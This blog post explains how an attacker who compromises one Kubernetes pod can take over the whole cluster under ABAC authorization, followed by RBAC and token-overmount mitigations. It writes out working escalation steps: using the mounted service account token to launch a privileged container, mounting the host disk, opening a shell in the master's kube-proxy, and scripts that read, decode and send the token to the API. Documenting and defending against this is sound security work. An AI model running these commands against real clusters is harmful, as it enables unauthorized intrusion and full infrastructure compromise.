Summary

This blog post is going to show you how to go from exploiting a single container to gaining root on an entire cluster and all nodes. This is caused by a default flaw in the way Kubernetes manages containers.

I’m doing a lot more container work at my day job: looking for container breakouts, reviewing container infrastructure, and digging into orchestration technologies. I’ve been involved in a few Kubernetes reviews and talked with others in the company about it, and there’s one vulnerability that seems to make it into almost every report, yet no one seems to think it’s as important as the security folks do. So I want to start a dialog.

The issue is that in order for a container/pod to be orchestrated by Kubernetes, Kubernetes must put an authentication token inside of the pod. This token grants complete control over the Kubernetes cluster.

The short of it is this:

If a single container is compromised, attackers can take over other pods, nodes, and the entire cluster. Easily.

If you don’t like reading, just open up one of your Kubernetes pods and look at /var/run/secrets/kubernetes.io/serviceaccount/token. If you see something there, you’re probably at risk.
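Here is a minimal sketch of that check, assuming a POSIX shell is available inside the pod. The function name `check_sa_token` and its optional directory argument are made up for illustration; only the default path comes from the text above.

```shell
#!/bin/sh
# Hypothetical helper: report whether a service account token is mounted.
# The optional directory argument exists only so the check can be pointed
# somewhere else (for example, at a test directory).
check_sa_token() {
    sa_dir="${1:-/var/run/secrets/kubernetes.io/serviceaccount}"
    # -s is true only when the file exists and is not empty.
    if [ -s "$sa_dir/token" ]; then
        echo "token present: $sa_dir/token"
    else
        echo "no token found in $sa_dir"
    fi
}

check_sa_token
```

Run it from a shell inside any pod you care about. A "token present" line means the rest of this post applies to you.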

Kubernetes Background

Kubernetes is a system from Google that seems (at least to me) to be becoming the de facto standard for container orchestration. Before I go into this one issue, I can say that I actually think it’s a great product. It allows you to orchestrate containers, keep track of key-value pairs, handle secrets, and set up the necessary infrastructure to do all of this out of the box. Compare that to the bash scripts and cron jobs that people have been using for container orchestration until now.

The main selling point is scalability and management. Kubernetes can scale up not just to run additional containers on a system, but also to create geographically dispersed containers across a network overlay, seamlessly integrated with a load balancer, that can auto-heal when needed.

Kubernetes is in direct competition with Docker Swarm, which aims to be a native solution built directly into Docker. Docker Swarm does support a lot of the same features, but it relies on a lot of additional support (e.g. KV pair storage) to make it work.



A couple of Kubernetes words that are operationally important:

- Pod: For the sake of discussion, synonymous with container.

- Node: A VM or box that can run pods.

- Services: Applications that do something on your cluster. (e.g. nginx)

- Master Node: A dedicated node that controls all other services.

If you’re an attacker, the thing you need to know is that there could be lots of services deployed in a cluster, but there is always one Kubernetes service that runs all of the management containers. Compromising this service compromises everything else.

The main flaw, as others have mentioned, is that there is no security boundary between pods, nodes, and services. Compromising one compromises them all (unless you’re using RBAC authorization).

Exploit Setup

I’m not going to say that this attack works on all systems but here are the systems that it affects:

- Latest Kubernetes as of writing the post (the kubectl download below is v1.6.7)

- ABAC authorization controls (default)

If you want to try this out, you can follow the pretty simple getting-started guide.

Exploit

- Exploit the container. Whether it runs a vulnerable package or gets compromised some other way, the attacker ends up with a shell inside of the container.

- Download the kubectl binary to interact with the Kubernetes API. Depending on the pod, you might have to install things like curl or wget first:

    apt update
    apt install curl
    curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.6.7/bin/linux/amd64/kubectl
    chmod +x ./kubectl

- You’re going to need to find the Kubernetes cluster master node. Here’s how to find it if you’re running the infrastructure:

    kubectl get services

You’ll see:

    NAME         CLUSTER-IP   EXTERNAL-IP   PORT(S)        AGE
    ghost        10.0.0.134   <nodes>       80:30916/TCP   20m
    kubernetes   10.0.0.1     <none>        443/TCP        21m
    nginxtest    10.0.0.57    <pending>     80:31399/TCP   11m

These are a ghost container, nginx, and the core kubernetes service, which is the one I care about.

But as the attacker, you’ll have to figure it out some other way. Like a port scan:

    apt update
    apt install nmap
    nmap -sS -p443 10.0.0.0/24

I haven’t looked to see how this IP is chosen but it’s always been .1 using Minikube and Tectonic. Your mileage may vary.
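A quieter option than scanning, sketched here: Kubernetes injects the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` environment variables into containers, so the compromised pod usually already knows where the API lives. The helper name `api_server_url` and the fallback argument are my own invention for illustration.

```shell
#!/bin/sh
# Hypothetical helper: build the API server URL from the environment
# variables Kubernetes injects into containers. If they are missing,
# fall back to an address passed as the first argument.
api_server_url() {
    host="${KUBERNETES_SERVICE_HOST:-${1:-}}"
    port="${KUBERNETES_SERVICE_PORT:-443}"
    if [ -z "$host" ]; then
        echo "API server address unknown" >&2
        return 1
    fi
    echo "https://$host:$port"
}

# 10.0.0.1 is the address seen in the service listing above.
api_server_url 10.0.0.1
```

If the variables are set, the fallback is ignored, so this also doubles as a sanity check on the .1 guess.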

- With that information I can now authenticate to the Kubernetes API on “10.0.0.1”. Check out this command:

    ./kubectl --server=https://10.0.0.1 \
      --insecure-skip-tls-verify=true \
      --token="$(</var/run/secrets/kubernetes.io/serviceaccount/token)" \
      run --rm -i -t busybox --image=busybox --restart=Never \
      --overrides='{"apiVersion": "v1", "spec":{"containers":
      [{"name":"busybox","image":"busybox","stdin":true, "tty":true,
      "securityContext":{"privileged":true}}]}}'

This connects to the Kubernetes service API using the token found in /var/run/secrets/kubernetes.io/serviceaccount/token and starts a privileged BusyBox container. The privileged option is obviously the important part.
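kubectl isn’t doing anything magic with the token here. As a rough sketch, the same credential can be sent to the REST API directly as a bearer token with curl, which is handy when you can’t download kubectl. The helper names `auth_header` and `list_pods` are hypothetical; the `/api/v1/namespaces/<namespace>/pods` path is the standard pod listing endpoint.

```shell
#!/bin/sh
# Sketch: talk to the API server directly with the mounted token.
# auth_header and list_pods are hypothetical helper names.

TOKEN_FILE_DEFAULT=/var/run/secrets/kubernetes.io/serviceaccount/token

# Print the HTTP header that carries the token as a bearer credential.
auth_header() {
    token_file="${1:-$TOKEN_FILE_DEFAULT}"
    [ -r "$token_file" ] || { echo "cannot read $token_file" >&2; return 1; }
    echo "Authorization: Bearer $(cat "$token_file")"
}

# List pods in a namespace. -k skips TLS verification, like
# --insecure-skip-tls-verify=true does for kubectl.
list_pods() {
    server="$1"
    namespace="${2:-default}"
    header="$(auth_header "${3:-}")" || return 1
    curl -sk -H "$header" "$server/api/v1/namespaces/$namespace/pods"
}
```

From inside the pod you would call something like `list_pods https://10.0.0.1`. Whether you get a pod list or a "forbidden" response tells you how much the token is allowed to do.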

- You’re now the root user inside a container that maps host information into the container. From there, why not try to read everything on the host file system?

    mkdir ohno
    mount /dev/sda1 ohno
    ls ohno/

You’ve just gained access to all files on that node. There are more malicious things you can do, but container breakouts are a separate subject.

Alternatively, if your goal is to compromise the rest of the cluster, why not just create a shell inside of the master node’s kube-proxy?

    ./kubectl --server=https://master-node --insecure-skip-tls-verify=true \
      --token="$(</var/run/secrets/kubernetes.io/serviceaccount/token)" \
      exec --namespace=kube-system \
      -it name-of-kube-proxy-pod -c kube-proxy bash

To summarize, you’ve just pivoted from one compromised pod to compromising the entire cluster.

Why it works

The Kubernetes API authenticates this communication using a token (under ABAC authorization). The token file is located at /var/run/secrets/kubernetes.io/serviceaccount/token. It’s there so that the pod can send useful information back to Kubernetes. What’s worse is that deleting it just means that it’ll be re-created. It’s actually a mounted path if you look at it:

    tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
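If you want to see whose token it is, here is a small sketch that decodes the middle section of the token. It assumes the token is a JWT (which is how service account tokens are encoded) and that `base64 -d` is available in the container. `jwt_payload` is a hypothetical helper name.

```shell
#!/bin/sh
# Sketch: print the claims (middle section) of a JWT-style token.
# jwt_payload is a hypothetical helper name.
jwt_payload() {
    # Take the second dot-separated field and map base64url to base64.
    part=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
    # base64url drops the '=' padding; restore it before decoding.
    case $(( ${#part} % 4 )) in
        2) part="$part==" ;;
        3) part="$part=" ;;
    esac
    printf '%s' "$part" | base64 -d
}

token_file=/var/run/secrets/kubernetes.io/serviceaccount/token
if [ -r "$token_file" ]; then
    jwt_payload "$(cat "$token_file")"
    echo
fi
```

The decoded JSON names the namespace and service account the token belongs to, which tells you which identity every pod using that account is sharing.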

The fix

Like I said, I don’t want to shame Kubernetes. It’s going to be a solid product and their roadmap is great. This is a known issue that should be highlighted because, IMHO, it makes a cluster less secure than if someone ran their own container orchestration with scripts. I really want Kubernetes to build security boundaries between each of its components.

Until that happens, here’s what you can do to mitigate:

- Role-Based Access Controls: This has been supported for a while but it was not enabled by default. If you don’t use this, AFAIK, you’re going to be vulnerable.

- Hack jobs: You can think about doing things to try to protect this value from being read by anyone else. Like I said, deleting it doesn’t do anything, but overmounting it with an empty directory might slow down an attacker.

- Wait: Kubernetes knows about the issue, and it’s a matter of determining how to phase the problem out.
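The overmount hack from the list above could look roughly like the sketch below: a pod spec that mounts an empty directory over the service account path. I’m assuming the cluster leaves that path alone when a pod already mounts something there, so verify it on your own cluster before relying on it. The function name `pod_without_token` and the volume name `no-token` are made up for illustration.

```shell
#!/bin/sh
# Sketch: print a pod manifest that mounts an empty directory over the
# service account path so the token is not visible inside the container.
# pod_without_token and the "no-token" volume name are hypothetical.
pod_without_token() {
    name="$1"
    image="$2"
    cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: $name
spec:
  containers:
  - name: $name
    image: $image
    volumeMounts:
    - name: no-token
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      readOnly: true
  volumes:
  - name: no-token
    emptyDir: {}
EOF
}

pod_without_token demo nginx
```

You could pipe the output into `kubectl create -f -` and then look at the path from inside the pod to confirm the token is gone. This hides the token from that pod only; it does nothing about what the token is allowed to do, so it’s no substitute for RBAC.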

Can you think of a better idea? Email me, I’d be interested in hearing it. In the meantime, if you ever find yourself in a net-pen and compromise a container, this is your ticket to taking over the rest of their infrastructure.